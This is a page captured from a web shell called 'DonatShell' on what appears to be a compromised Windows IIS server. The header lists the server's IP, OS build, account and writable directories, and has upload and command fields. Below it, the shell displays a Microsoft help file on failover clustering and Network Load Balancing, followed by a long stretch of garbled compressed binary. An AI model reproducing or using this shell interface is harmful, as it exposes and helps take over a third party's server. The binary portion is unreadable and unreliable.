DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/Help/Windows/en-US/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/Help/Windows/en-US/cluster_start.h1s
MZ@PEL!@0d@.rsrc@@.its @@0	HX||4VS_VERSION_INFOStringFileInfo040904b0b!FileVersion1.00.00                         l"FileDescriptionCompiled Microsoft Help 2.0 TitleBFileStamp84EDBC0A01CA041F4JCompilerVersion2.5.71210.08579VCompileDate2009-07-14T01:07:55      >TopicCount3I000000000000ALegalCopyright 2005 Microsoft Corporation. All rights reserved.CCCCCCCCCCCCCDVarFileInfo$Translation	ti
_ITOLITLS(X쌡^
V`   x )CAOLPHHC ITSF #{	-Y쌡^
VY쌡^
VIFCMAOLL)IFCM AOLL//$FXFtiAttribute//$FXFtiAttribute/BTREE]/$FXFtiAttribute/DATA/$FXFtiAttribute/PROPERTYuN/$FXFtiMain//$FXFtiMain/BTREEw/$FXFtiMain/DATA/$FXFtiMain/PROPERTYN/$Index/$ATTRNAMEc\/$Index/$PROPBAGO/$Index/$STRINGS/$Index/$SYSTEMmb
/$Index/$TOC//$Index/$TOC/$cluster_startl/$Index/$TOPICATTRC /$Index/$TOPICS-@/$Index/$URLSTR
/$Index/$URLTBL/$Index/$VTAIDX?H/$Index/AssetId//$Index/AssetId/$LEAVES	/$OBJINSTl/assets/0/assets/9db79601-895d-4148-8cbb-85a1edcf982f.xmltb/cluster_start.h1cV//cluster_start.H1FC/cluster_start.H1Tk/cluster_start.H1VHR/cluster_start_AssetId.H1Kk/cluster_start_BestBet.H1Kpk/cluster_start_LinkTerm.H1K[l/cluster_start_SubjectTerm.H1KGo::DataSpace/NameList<(::DataSpace/Storage/MSCompressed/Content6H,::DataSpace/Storage/MSCompressed/ControlDataT )::DataSpace/Storage/MSCompressed/SpanInfoL/::DataSpace/Storage/MSCompressed/Transform/List<_::DataSpace/Storage/MSCompressed/Transform/{8CEC5846-07A1-11D9-B15E-000D56BFE6EE}/InstanceData/i::DataSpace/Storage/MSCompressed/Transform/{8CEC5846-07A1-11D9-B15E-000D56BFE6EE}/InstanceData/ResetTable~H3::Transform/{8CEC5846-07A1-11D9-B15E-000D56BFE6EE}/vFTp)UncompressedMSCompressedFX쌡^
VQLZXCHH<maml:conceptual contentType="conceptual" xmlns:maml="http://schemas.microsoft.com/maml/2004/10" xmlns:dev="http://schemas.microsoft.com/maml/dev/2004/10"><maml:title>Availability and Scalability Overview</maml:title><maml:introduction>
<maml:para>By using the clustering technologies in products in the Windows Server® 2008 R2 operating system, you can help increase the availability and scalability for applications that are critically important to your organization. These applications include corporate databases, e-mail, and Web-based services such as retail Web sites. By using appropriate clustering technologies and carefully implementing good design and operational practices (for example, configuration management and capacity management), you can scale your installation appropriately and ensure that your applications and services are available whenever customers and employees need them.</maml:para>
<maml:para>This topic contains the following sections:</maml:para>
<maml:list class="unordered">
<maml:listItem><maml:para><maml:navigationLink><maml:linkText>Availability, scalability, and clustering technologies</maml:linkText><maml:uri href="mshelp://windows/?id=9db79601-895d-4148-8cbb-85a1edcf982f#BKMK_availability"></maml:uri></maml:navigationLink></maml:para></maml:listItem>
<maml:listItem><maml:para><maml:navigationLink><maml:linkText>Failover cluster overview</maml:linkText><maml:uri href="mshelp://windows/?id=9db79601-895d-4148-8cbb-85a1edcf982f#BKMK_failover"></maml:uri></maml:navigationLink></maml:para></maml:listItem>
<maml:listItem><maml:para><maml:navigationLink><maml:linkText>Network Load Balancing overview</maml:linkText><maml:uri href="mshelp://windows/?id=9db79601-895d-4148-8cbb-85a1edcf982f#BKMK_network"></maml:uri></maml:navigationLink></maml:para></maml:listItem>
</maml:list>
</maml:introduction><maml:content><maml:sections><maml:section address="BKMK_availability">
<maml:title>Availability, scalability, and clustering technologies</maml:title><maml:introduction>
<maml:para>High availability is the ability to provide user access to a service or application for a high percentage of scheduled time by attempting to reduce unscheduled outages and mitigate the impact of scheduled downtime for particular servers. Scalability is the ability to easily increase or decrease computing capacity. A cluster consists of two or more computers working together to provide a higher level of availability, scalability, or both than can be obtained by using a single computer.</maml:para>
<maml:para>Windows Server 2008 R2 provides two clustering technologies: failover clusters and Network Load Balancing (NLB). Failover clusters primarily provide high availability. Network Load Balancing provides scalability and helps increase the availability of Web-based services.</maml:para>
<maml:para>Your choice of cluster technologies (failover clusters or Network Load Balancing) depends primarily on whether the applications you run have long-running, in-memory state.</maml:para>
<maml:list class="unordered">
<maml:listItem><maml:para><maml:phrase>Failover clusters</maml:phrase> are designed for applications that have long-running, in-memory state, or that have large, frequently updated data states. These are called "stateful" applications, and they include database applications and messaging applications. Typical uses for failover clusters include file servers, print servers, database servers, and messaging servers. </maml:para></maml:listItem>
<maml:listItem><maml:para><maml:phrase>Network Load Balancing</maml:phrase> is intended for applications that do not have long-running, in-memory state. These are called "stateless" applications. A stateless application treats each client request as an independent operation, and therefore it can load-balance each request independently. Stateless applications often have read-only data or data that changes infrequently. Front-end Web servers, virtual private networks (VPNs), File Transfer Protocol (FTP) servers, and firewall and proxy servers typically use Network Load Balancing. Network Load Balancing clusters can also support other TCP- or UDP-based services and applications.</maml:para></maml:listItem>
</maml:list>
</maml:introduction></maml:section><maml:section address="BKMK_failover">
<maml:title>Failover cluster overview</maml:title><maml:introduction>
<maml:para>By using a failover cluster, you can ensure that users have nearly constant access to important server-based resources. A failover cluster is a set of independent computers that work together to increase the availability of services and applications. The clustered servers (called nodes) are connected by physical cables and by software. If one of the nodes fails, another node begins to provide service through a process known as failover.</maml:para>
<maml:para>You can use the Failover Cluster Manager snap-in to validate failover cluster configurations, create and manage failover clusters, and migrate some resource settings to a cluster running Windows Server 2008 R2.</maml:para>
<maml:para>In Windows Server 2008, the changes to failover clusters (formerly known as server clusters) are aimed at simplifying cluster setup and management, making the clusters more secure and stable, improving networking in clusters, and improving how failover clusters communicate with storage.</maml:para>
</maml:introduction>
<maml:sections>
<maml:section>
<maml:title>What are failover clusters?</maml:title><maml:introduction>
<maml:para>A failover cluster is a group of independent servers that are running Windows Server 2008 and working together to increase the availability of services and applications. When a failure occurs on one computer in a cluster, resources are redirected and the workload is redistributed to another computer in the cluster. You can use failover clusters to ensure that users have nearly constant access to important server-based resources.</maml:para>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Hardware and software considerations for failover clusters</maml:title><maml:introduction>
<maml:alertSet class="note"><maml:title>Note </maml:title><maml:para>A limited set of server roles is available for the Server Core installation option of Windows Server 2008 and for Windows Server 2008 for Itanium-Based Systems.</maml:para></maml:alertSet>
<maml:para>Microsoft supports a failover cluster solution only if all the hardware components are marked as "Certified for Windows Server 2008 R2." In addition, the complete configuration (servers, network, and storage) must pass all tests in the Validate a Configuration Wizard, which is included in the Failover Cluster Manager snap-in.</maml:para>
<maml:para>The software used for managing a failover cluster is the Failover Cluster Manager snap-in, which is installed as part of the failover cluster feature in Windows Server 2008 R2. The underlying service that supports failover clusters is the Cluster service.</maml:para>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Installing the failover cluster feature</maml:title><maml:introduction>
<maml:para>Use Initial Configuration Tasks or Server Manager to install features. To install the failover cluster feature: </maml:para>
<maml:list class="ordered">
<maml:listItem><maml:para>In the list of tasks, click <maml:ui>Add features</maml:ui>. </maml:para></maml:listItem>
<maml:listItem><maml:para>In the list of features presented in the wizard, click <maml:ui>Failover Clustering</maml:ui>.</maml:para></maml:listItem>
</maml:list>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Managing a failover cluster</maml:title><maml:introduction>
<maml:para>Server roles and features are managed by using Microsoft Management Console (MMC) snap-ins. To open the failover cluster snap-in, click <maml:ui>Start</maml:ui>, click <maml:ui>Administrative Tools</maml:ui>, and then click <maml:ui>Failover Cluster Manager</maml:ui>.</maml:para>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Additional references for failover clusters</maml:title><maml:introduction>
<maml:para>To learn more about failover clusters, you can view the Help on your server. To do this, open the failover cluster snap-in as described in the previous section, and then press F1. </maml:para>
<maml:para>For more information about failover clusters, see the following resources on the Microsoft Web site:</maml:para>
<maml:list class="unordered">
<maml:listItem><maml:para>For a list of links to a variety of topics about failover clusters, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=68633</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=68633"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>
<maml:listItem><maml:para>For design and deployment information for failover clusters, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=137832</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=137832"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>
<maml:listItem><maml:para>For operations information for failover clusters, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=137835</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=137835"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>
<maml:listItem><maml:para>For troubleshooting information for failover clusters, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=137836</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=137836"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>

</maml:list>
</maml:introduction></maml:section>
</maml:sections>
</maml:section><maml:section address="BKMK_network">
<maml:title>Network Load Balancing overview</maml:title><maml:introduction>
<maml:para>The Network Load Balancing (NLB) feature enhances the availability and scalability of Internet server applications such as those used on Web, FTP, firewall, proxy, virtual private network (VPN), and other mission-critical servers.</maml:para>
</maml:introduction>
<maml:sections>
<maml:section>
<maml:title>What are NLB clusters?</maml:title><maml:introduction>
<maml:para>A single computer running Windows can provide a limited level of server reliability and scalable performance. However, by combining the resources of two or more computers running one of the products in Windows Server 2008 R2 into a single virtual cluster, NLB can deliver the reliability and performance that Web servers and other mission-critical servers need.</maml:para>
<maml:para>Each host runs a separate copy of the desired server applications (such as applications for Web, FTP, and Telnet servers). NLB distributes incoming client requests across the hosts in the cluster. The load weight to be handled by each host can be configured as necessary. You can also add hosts dynamically to the cluster to handle increased load. In addition, NLB can direct all traffic to a designated single host, which is called the default host.</maml:para>
<maml:para>NLB allows all of the computers in the cluster to be addressed by the same set of cluster IP addresses, and it maintains a set of unique, dedicated IP addresses for each host. For load-balanced applications, when a host fails or goes offline, the load is automatically redistributed among the computers that are still operating. When a computer fails or goes offline unexpectedly, active connections to the failed or offline server are lost. However, if you bring a host down intentionally, you can use the <maml:computerOutputInline>drainstop</maml:computerOutputInline> command to service all active connections prior to bringing the computer offline. When it is ready, the offline computer can transparently rejoin the cluster and regain its share of the workload, which allows the other computers in the cluster to handle less traffic.</maml:para>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Hardware and software considerations for NLB clusters</maml:title><maml:introduction>
<maml:para>The following list outlines the hardware and software considerations for NLB clusters:</maml:para>
<maml:list class="unordered">
<maml:listItem><maml:para>NLB is installed as a standard Windows networking driver component. </maml:para></maml:listItem>
<maml:listItem><maml:para>NLB requires no hardware changes to enable and run. </maml:para></maml:listItem>
<maml:listItem><maml:para>NLB Manager enables you to create new NLB clusters and to configure and manage clusters and all of the cluster's hosts from a single remote or local computer.</maml:para></maml:listItem>
<maml:listItem><maml:para>NLB lets clients access the cluster by using a single, logical Internet name and virtual IP address—known as the cluster IP address (it retains individual names for each computer). NLB allows multiple virtual IP addresses for multihomed servers.</maml:para>
<maml:alertSet class="note"><maml:title>Note </maml:title><maml:para>In the case of virtual clusters, the servers do not need to be multihomed to have multiple virtual IP addresses.</maml:para></maml:alertSet>
</maml:listItem>
<maml:listItem><maml:para>NLB can be bound to multiple network adapters, which allows you to configure multiple independent clusters on each host. Support for multiple network adapters is different from virtual clusters in that virtual clusters allow you to configure multiple clusters on a single network adapter.</maml:para></maml:listItem>
</maml:list>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Installing the NLB feature</maml:title><maml:introduction>
<maml:para>To use Network Load Balancing (NLB), a computer must have only TCP/IP on the adapter on which NLB is installed. Do not add any other protocols (for example, IPX) to this adapter. NLB can load balance any application or service that uses TCP/IP as its network protocol and is associated with a specific Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) port.</maml:para>
<maml:para>To install and configure NLB, you must use an account that is listed in the Administrators group on each host. If you are not using an Administrators group account when you install and configure each host, you will be prompted to provide the logon credentials for such an account. To set up an account that NLB Manager will use by default: </maml:para>
<maml:list class="ordered">
<maml:listItem><maml:para>In NLB Manager, expand the <maml:ui>Options</maml:ui> menu. </maml:para></maml:listItem>
<maml:listItem><maml:para>Click <maml:ui>Credentials</maml:ui>. </maml:para></maml:listItem>
</maml:list>
<maml:para>We recommend that this account not be used for any other purpose.</maml:para>
<maml:para>You can use Initial Configuration Tasks or Server Manager to install NLB. To install NLB: </maml:para>
<maml:list class="ordered">
<maml:listItem><maml:para>In the list of tasks, click <maml:ui>Add features</maml:ui>.</maml:para></maml:listItem>
<maml:listItem><maml:para>In the list of features in the wizard, click <maml:ui>Network Load Balancing</maml:ui>.</maml:para></maml:listItem>
</maml:list>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Managing NLB</maml:title><maml:introduction>
<maml:para>Server roles and features are managed by using Microsoft Management Console (MMC) snap-ins. To open the Network Load Balancing Manager snap-in:</maml:para>
<maml:list class="ordered">
<maml:listItem><maml:para>Click <maml:ui>Start.</maml:ui></maml:para></maml:listItem>
<maml:listItem><maml:para>Click <maml:ui>Administrative Tools</maml:ui>.</maml:para></maml:listItem>
<maml:listItem><maml:para>Click <maml:ui>Network Load Balancing Manager</maml:ui>. </maml:para></maml:listItem>
</maml:list>
<maml:para>You can also open Network Load Balancing Manager by typing <maml:computerOutputInline>Nlbmgr</maml:computerOutputInline> at a command prompt.</maml:para>
</maml:introduction></maml:section>
<maml:section>
<maml:title>Additional references for NLB</maml:title><maml:introduction>
<maml:para>To learn more about NLB, you can view the Help on your server. To do this, open Network Load Balancing Manager as described in the previous section, and then press F1.</maml:para>
<maml:list class="unordered">
<maml:listItem><maml:para>For deployment information for NLB, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=87253</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=87253"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>
<maml:listItem><maml:para>For operations information for NLB, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=87254</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=87254"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>
<maml:listItem><maml:para>For troubleshooting information for NLB, see <maml:navigationLink><maml:linkText>http://go.microsoft.com/fwlink/?LinkId=87255</maml:linkText><maml:uri href="http://go.microsoft.com/fwlink/?LinkId=87255"></maml:uri></maml:navigationLink>.</maml:para></maml:listItem>
</maml:list>
</maml:introduction></maml:section>
</maml:sections></maml:section></maml:sections></maml:content></maml:conceptual><?xml version="1.0" encoding="utf-8"?>
<HelpCollection Id="cluster_start" DTDVersion="1.0" FileVersion="" LangId="1033" Copyright="© 2005 Microsoft Corporation. All rights reserved." Title="cluster_start" xmlns="http://schemas.microsoft.com/help/collection/2004/11">
	<CompilerOptions CompileResult="H1S" CreateFullTextIndex="Yes" BreakerId="Microsoft.NLG.en.WordBreaker">
		<IncludeFile File="cluster_start.H1F" />
	</CompilerOptions>
	<TOCDef File="cluster_start.H1T" Id="cluster_start_TOC" />
	<VTopicDef File="cluster_start.H1V" />
	<KeywordIndexDef File="cluster_start_AssetId.H1K" />
	<KeywordIndexDef File="cluster_start_BestBet.H1K" />
	<KeywordIndexDef File="cluster_start_LinkTerm.H1K" />
	<KeywordIndexDef File="cluster_start_SubjectTerm.H1K" />
	<ItemMoniker Name="!DefaultTOC" ProgId="HxDs.HxHierarchy" InitData="AnyString" />
	<ItemMoniker Name="!DefaultFullTextSearch" ProgId="HxDs.HxFullTextSearch" InitData="AnyString" />
	<ItemMoniker Name="!DefaultAssetIdIndex" ProgId="HxDs.HxIndex" InitData="AssetId" />
	<ItemMoniker Name="!DefaultBestBetIndex" ProgId="HxDs.HxIndex" InitData="BestBet" />
	<ItemMoniker Name="!DefaultAssociativeIndex" ProgId="HxDs.HxIndex" InitData="LinkTerm" />
	<ItemMoniker Name="!DefaultKeywordIndex" ProgId="HxDs.HxIndex" InitData="SubjectTerm" />
</HelpCollection><?xml version="1.0" encoding="utf-8"?>
<HelpFileList xmlns="http://schemas.microsoft.com/help/filelist/2004/11">
	<File Url="assets\9db79601-895d-4148-8cbb-85a1edcf982f.xml" />
</HelpFileList><?xml version="1.0" encoding="utf-8"?>
<VTopicSet DTDVersion="1.0" xmlns="http://schemas.microsoft.com/help/vtopic/2004/11">
	<Vtopic Url="assets\9db79601-895d-4148-8cbb-85a1edcf982f.xml" RLTitle="Availability and Scalability Overview">
		<Attr Name="assetid" Value="9db79601-895d-4148-8cbb-85a1edcf982f" />
		<Keyword Index="AssetId" Term="9db79601-895d-4148-8cbb-85a1edcf982f" />
		<Keyword Index="AssetId" Term="9db79601-895d-4148-8cbb-85a1edcf982f1033" />
		<Attr Name="appliesToProduct" Value="Windows Server 2008 R2" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2DATACENTERNOHVSERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2DATACENTERSERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2ENTERPRISEIA64SERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2ENTERPRISENOHVSERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2ENTERPRISESERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2STANDARDNOHVSERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2STANDARDSERVER" />
		<Attr Name="APPLIESTOPRODUCTSPECIFIC" Value="WS08R2WEBSERVER" />
		<Attr Name="appliesToSite" Value="BWCOnly" />
		<Attr Name="CommunityContent" Value="1" />
		<Attr Name="WillHaveMamlFeed" Value="True" />
		<Attr Name="zzpub_assetBug" Value="1710" />
		<Attr Name="zzpub_MtpsProductFamily" Value="WS" />
		<Attr Name="zzpub_MTPSVersion" Value="11" />
		<Attr Name="Locale" Value="kbEnglish" />
		<Attr Name="AssetID" Value="9db79601-895d-4148-8cbb-85a1edcf982f" />
		<Attr Name="TopicType" Value="kbArticle" />
	</Vtopic>
</VTopicSet><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE HelpTOC>
<HelpTOC xmlns="http://schemas.microsoft.com/help/toc/2004/11" DTDVersion="1.0" Id="cluster_start_TOC" FileVersion="" LangId="1033" ParentNodeIcon="Book" PluginStyle="Hierarchical">
	<HelpTOCNode Url="mshelp://windows/?tocid=558f0802-5ac7-457e-b8ea-5e12c37d7c90" Title="">
		<HelpTOCNode Url="mshelp://windows/?id=9db79601-895d-4148-8cbb-85a1edcf982f" Title="Availability and Scalability Overview" />
	</HelpTOCNode>
</HelpTOC><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE HelpIndex>
<HelpIndex DTDVersion="1.0" Name="AssetId" /><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE HelpIndex>
<HelpIndex DTDVersion="1.0" Name="BestBet" /><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE HelpIndex>
<HelpIndex DTDVersion="1.0" Name="LinkTerm" /><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE HelpIndex>
<HelpIndex DTDVersion="1.0" Name="SubjectTerm" /> UyT`VU?"}*.BkQiAA
"SjT!Tha"!ҖRQRB$Dj]U\79_<*Q\BMH4۳1SaaVAB)K[4C.U rtۢ'zA(IIa@5D3x'. DM)Me\Kn3Ϣ/.|wO,-6oAt?tUuYuOqLFt>S|?:RuWn\Ssԟt-:uOp?_ye6;w^7~H9_.x	wm3oxcWrLpGOпv.>7Džο?.\8~-nvy,/n4_7̿|r2n&{Ӽi^ݎm}w]smͽ7w87x7}w<J@^z.륷3}~O~w=wӞܥC=lQ}OVz;zJq~sNt:SpKھ->oύۉyhs$<vԯ}ku+).{ݛ|מҧ޾_sy6`zna'}o^ޮ7ُ=om]ov%BϱfoT쯝Uo۝oV;Hۈ?FoG?̮nDvz.;W%Fm_ē^vw퓝\o۝7H˽_okrmvr
{+1v(޽W\~7}W}W?5~꫾:zꩾ꫾걾_]jY__[jjޯ>7;IػuލnZ
{;{wo}xހ[7{|#;.gkw{o6ߏ}!Gw▼poWvff+نn4__lvbGzZa'_>_הו//זl/_C^cvFz:.vVs;^bz
5{l//6ףI_i_ؗ_ؒbu[նݬ/]l^v{39ۑs}h[ܻwiwq_G<z>bjȿw|G}lwMM;dxGqsй<8S^k;h~~G?xqă$xx4ȡ?DƄ[>t՚MyfJqtNqMuͼϞlcww~ɿ(.Ew;}+N):;SJuN靷)sS:uJN):SJ,vOy{Oyҝ)ҹ)3=:S3>S:>:SJ&|t|Jt6çJF|t|JtVŧJf|tf܎ON)S:s>:KSJ|tg|Jt˧Jg|tgvJ鬙OάOΛy9)ҝ=)A)9:S>S:3>:S>S:}JtFԧJV}t}Jtfn:øSJ,wN)3>S:wJlN)ҝ_)S:wJ鬱O,N)3>S:3>:׾SJ}t~o)3<tܧJg}tg}JtނOνy})3>:S3.<t~Jt<O)ҙ#S:s<tNy:3SJxO)3<t9ΒtYKr:p09x^/ŋx/^x^/ŋx/^x^/ŋx/^x^/ŋx/^x^/ŋx/^x^/ŋx/^x^/ŋx/^r)hȆGCh
+Ϗ4~
-GC4~
/Џ8h4|>
eGCѐ,~4
Gaxh

8ҏ!h*K?!h:?Oԏ!hJS?!0hVV?h~4
<ÞGP|4>
CGѰ~4
@!h?cُ!Xh4
}?fُh>
CGpHh4,}?lGð4t"}?o܏!hʓ>
JG!h8l}4:>
Pݏ!0h(}4R>
VG!ZV/"8`00``00``00``00``00``00``00``0?~}DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDG}8~WigwUo񘛟^yqդ?/ƛO9NpʷS6͇IN9IpZogRXsJRqNsJRJzJ)8>wRo4{w,;g ό#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1b#Fb1F#Ĉ1bԄ@&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&?1C!d2!CȐ2dC!d2!CȐ2dC!d2!CȐ2dC!d2!CȐ2dC!d2!CȐ2dC!d2!CȐ2dC!d2!CȐ2dC!d2!CȐ2dC!d2!C5[b7?WYDٷ8EHpp\.¸p.\…p\.¸p.\p5ո¸p.\…p\.¸p.\…p\Y¸p.\,p\.¸p.\n-uegָp.\…p\.5\<Ӯ­p\.¸p.\…p\.¸p.\rGAwgGv}p;C>}Q.w3n<#w'q<v}c?	}G~H<C<n|xD̈́/ywU\M#44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM4w?:Ķګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګj~sFiiӴ4MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM4]?jjګjjګjjڵzõ[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[[mVmV[ծ~?4"M44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM4_͟#qćn'n&p.\*,&.jګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjګjjڷqGD>iiiiiiiiiiiiiiiiiiiiiiii@iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiimiiiiiiiiiiiiiiiiiiiiiiiiiiii(?M44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44MM44Mmӌ&iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii7|4M@4F	WJ+oZ329kPZkV@SAey)JS72\J,HsanT:}`y""}}WwvF κL7LJ]V&W"$ĜB
USXʍԴ9pQiC"ضuB6n{0wo-YY,Y`4\Q[[1Wo_m+h*83'UE<(Q#	' Ι񙙘zP,np|hS&$Lr;]%'Ӟ7N$ra
^`dKLqȱWX_Ih枔iUs{ʹ)8;ٿwf'y5.i롡ǯNt};=^\GҜ;wSJ{='}by
u%řTFl4MCݥ(iQ>8
]y
c[fjw>T$%=J^O%I\{KcA+G%l{iƟyj
g/H!j#F-
_}LI߳X(EIr7rݍ2|=xY*%է"$֡.6?:"S)KmSmi|譎_D[.
o1Fϑ;sTKd-还-i?wUQQwG-);:tqRu2謽_MM0lu\J|u*,UT6^Iwį(ppQy~|Kӧ5ޡmh[m~[ކ+WOe.,Թѫ}.*(O؞>c#?*QGBⶵ,f^IvK[;tlEbo5GVbSNý\cCK0Эz$p׌TVd*0lXfi!
هS`)[x^|d
`DL|VdvX۶󏼛]>VZ*IDh-E}tFWX`UoE+<p1Hp!/\*0wx'$<eY]Q"J~M};) JdSUM(;+koO(|V~ּG/1|4gYgHg.Ow)3aDv%e]>Z)ItuaIߗ,90>zL)wWݒf=@l*bX(c&5=kx:GT/nUY"eLTbqjBM)R~ZgYO	-
T řQPV'OX!,ۄb}@ܓWW!5<:@
۸{Ʒ,AK%%P`ie)JCl˽4xLvL*WN&5[oބ\>V՞T|q)+B'Pm%1VKr7ucV/5v܊8b / Vuyۥ@'V䌃%VpWz챳r/UX1-Fy.ƔD}Kr*<ΕU*ҿi	^0-ت;uh׶p\݇MS)N3$u[g
0ҠԸ$թ0pAEnt[߁6/p_exzv<
~oB
˩>mNF;AYxS=:[!v8k`S7KY$¹6
lZ͊w<%B-X9f͒ 6eKq~:(+˂+ڝnLכ;BqxJVry"S^_|5-*`e{u~z0_+۝C}jz7zA╭+gV~vMq9Z	c%ro[To'hlH"29XykPmW8`}y1%\}\JXJR^6aSg2쓲l:(yճLʮ#X Zv^Zn7>UFB3Ԗ;eGӚ5:~+Ɠ'8P>aJs(P73~mlj,HOn0nbLKs|2<KH6w<ٸz|f3~[_6ҸsщJ
Nw^@Z_4Κ8	>ڨ2F$Ur*YT6EfIV+S,}K)}[xf,'h]._y!CgK/'
یbEekVvp&p,!'מbz|ø|C5wEk vX.i{r.ׇG+'P(G
{:T
>vϥl0+
Uc f~Eb-Ci#[rz~iNJ8;_w6ec.FcyW#*9j'aR1}^U%۟MzS6`(oM$/
]sÑq;,ᱶ1B@Ek|QPެw7VMyᎲi 
#hXĩxhW"bad-9J-8bH
'*nQ%t[q|ERЃZX~k7Ճ?\'Vڻdeᤴns6-ڋす!Sa6{|u1ܮѹۇksd!y%x`ipesmF
3;};~N:BڲG3
L/~gJHA]W7\:Ļ{+%9
Df(qyXbz3N/6s\NY
Y?^/t͟7n21~2T>z
6Y"oJ%<ܕ'U$cdp]njj[uMhZ➚?nCKl:ImW\-
NE~29]vQdxͰ9yi,%^L>|jBMÇ1{xDF+_y"9U"Fڀ%Q؆e8讑<"w
mjUaZ9<鏠
&C;Ԣ	s$LTR5ٛrh(ZwܖE{M\8Xi;X׎aμzBlNY'4k8C	PJJ\U"F&sh,|hGN~}WSĺO	GfTAW~a6MyWN>,qDo+Xp(]&Qk.
Q>ۖsb!ʄq6[kmUYiy쀢=m@i&0d?7;@/Tt<_
<3_5UI)F)vbh.
4K~2sR=j$vS=+eݾ|`:%R/zHݣYjJMö1u6㼹UZ8z+QoyeEVBTs|u:rI͗cP61yB/F5䝞aD=[rՂȏd|oE3n5M@=xk{#X=9AJdUt;|JU~iRھQzw1*Nh9FߒaQ,O;
Ώl)v2J?@f!ٔv4V:5[ܞ-k)Pw/676CʡɚB=5p'ܼ.zG#n?ƪcf\6̸UגR(1.F,Dy~_EOԅظ^*.J⧈9v~gFDEѢrbw1hO4WT'$dg$Y,5 c"       B_qtdm	:
!G\QA۩ˀ}`1^=B;h;+XHӵJTw}u,hwi}M1$|+]{7hQ2˶3NMhD
